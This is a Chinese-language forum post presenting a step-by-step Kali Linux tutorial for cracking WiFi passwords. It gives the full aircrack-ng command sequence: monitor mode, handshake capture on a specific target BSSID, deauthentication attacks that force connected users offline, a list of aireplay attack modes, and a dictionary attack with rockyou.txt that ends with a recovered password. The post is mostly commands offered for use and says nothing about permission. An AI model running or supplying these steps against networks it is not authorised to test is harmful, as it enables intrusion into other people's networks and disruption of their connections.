利用KALI暴力破解WiFi密码
本帖最后由 薯片 于 2018-9-3 16:59 编辑1.将无线网卡设置成 monitor 模式 airmon-ng start wlan0
关闭可影响实验的因素 airmon-ng check kill
2.运行 airodump-ng wlan0 扫描附近网段
暴力破解 WiFi 密码
BSSID wifi 设备的 mac 地址
PWR 信号强度
Beacons 数据的速率
#Data 捕获的数据分组数量
#/S 十秒内的捕获数据分组数量
CH 信道号
MB 数据传输速率
ENC 加密类型
CIPHER 加密算法
AUTH 加密协议
ESSID WiFi 名称
3.确定好要破解的网络(以 2.4G 网络(备·)为例) 执行下面的命令
airodump-ng wlan0 –bssid F4:6A:92:2E:E8:B4 -c 1 -w pj/01
注释:-c 为指定信道 -w 为文件存放位置并起一个名
暴力破解 WiFi 密码
出现红框内内容表示已抓取到握手包 准备破解密码
如果抓不到握手包 可以发动攻击使一个已连接的用户掉线 使其重新认证连接 我们就此机会抓取握手包
aireplay-ng -0 10 -a F4:6A:92:2E:E8:B4 -c 78:02:F8:F1:8E:CD wlan0
暴力破解 WiFi 密码
注释:攻击模式为 0 攻击 10 次 攻击次数调为 0 为无限攻击 -a 为 AP 端 mac 地址 -c 为客户端 mac 地址 wlan0 为无线网卡的名字
附介绍几种攻击模式
Attack 0: Deauthentication 解除认证
Attack 1: Fake authentication 伪造身份验证
Attack 2: Interactive packet replay 交互式数据包重播
Attack 3: ARP request replay attack ARP 请求重播攻击
Attack 4: KoreK chopchop attack KoreK 斩杀攻击
Attack 5: Fragmentation attack 碎片攻击
Attack 6: Cafe-latte attack 咖啡拿铁攻击
Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击
Attack 8: WPA Migration Mode WPA 迁移模式
Attack 9: Injection test 注射试验
4.ls 01*查看抓到包 选择 cap 格式
暴力破解 WiFi 密码
使用字典暴力破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt 01-02.cap
暴力破解 WiFi 密码
破解成功 密码为 15331301 给自己顶一下 这个看起来不错
页:
[1]